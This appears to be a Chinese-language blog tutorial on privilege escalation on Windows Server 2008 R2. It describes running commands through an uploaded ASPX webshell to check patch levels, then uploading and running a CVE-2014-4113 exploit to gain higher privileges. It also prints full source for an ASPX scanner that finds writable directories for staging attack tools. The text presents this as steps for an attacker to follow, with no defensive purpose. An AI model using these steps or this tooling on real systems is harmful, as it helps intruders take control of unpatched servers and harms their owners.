1. 简介
在winserver2008 r2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具进行提权。
2. CVE-2014-4113-Exploit
利用该提取工具对winserver2008进行溢出提权。
3. 利用过程
通过aspxshell,输入/c Set查看系统信息(比如系统版本、补丁等情况)来决定是否利用该方法或者选择相应的提权版本。
有时候路径访问没有权限,可以换其他的路径上传,上传成功后执行即可提权
4. 扫描可写硬盘
上传该脚本(aspx)并访问它可以显示出所有可写目录
1 <%@ Page Language="C#" ValidateRequest="false" %> 2 <%@ Import Namespace="System.IO" %> 3 <%@ Import Namespace="System.Text" %> 4 5 6 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 7 <html xmlns="http://www.w3.org/1999/xhtml"> 8 <head runat="server"> 9 <title>ScanWrtieable</title> 10 </head> 11 <body> 12 13 <script runat="server"> 14 15 protected void Page_Load(object sender, EventArgs e) 16 { 17 } 18 int cresults; 19 protected void ScanRights(DirectoryInfo cdir) 20 { 21 try 22 { 23 if (Int32.Parse(TextBox_stopat.Text) > 0) 24 { 25 if (cresults > Int32.Parse(TextBox_stopat.Text)) 26 return; 27 } 28 DirectoryInfo[] subdirs = cdir.GetDirectories(); 29 foreach (DirectoryInfo item in subdirs) 30 { 31 ScanRights(item); 32 } 33 34 File.Create(cdir.FullName + "\\test").Close(); 35 36 this.Lb_msg.Text += cdir.FullName+"<br/>"; 37 cresults++; 38 File.Delete(cdir.FullName + "\\test"); 39 40 } 41 42 catch { } 43 } 44 System.DateTime start = DateTime.Now; 45 protected void ClearAllThread_Click(object sender, EventArgs e) 46 { 47 this.Lb_msg .Text= ""; 48 cresults = 0; 49 ScanRights(new DirectoryInfo(Fport_TextBox.Text)); 50 TimeSpan usetime = System.DateTime.Now - start; 51 this.Lb_msg.Text +="usetime: "+ usetime.TotalSeconds.ToString(); 52 } 53 54 55 </script> 56 57 <form id="form1" runat="server"> 58 59 <div> 60 start<asp:TextBox ID="Fport_TextBox" runat="server" Text="c:\" Width="60px"></asp:TextBox> 61 Stopat <asp:TextBox ID="TextBox_stopat" runat="server" Text="5" Width="60px"></asp:TextBox>files 62 <asp:Button ID="Button" runat="server" OnClick="ClearAllThread_Click" Text="ScanWriterable" /><br /> 63 <asp:Label ID="Lb_msg" runat="server" Text=""></asp:Label> 64 <br /> 65 </div> 66 <div>Code By <a href ="http://www.hkmjj.com">Www.hkmjj.Com</a></div> 67 </form> 68 </body> 69 </html>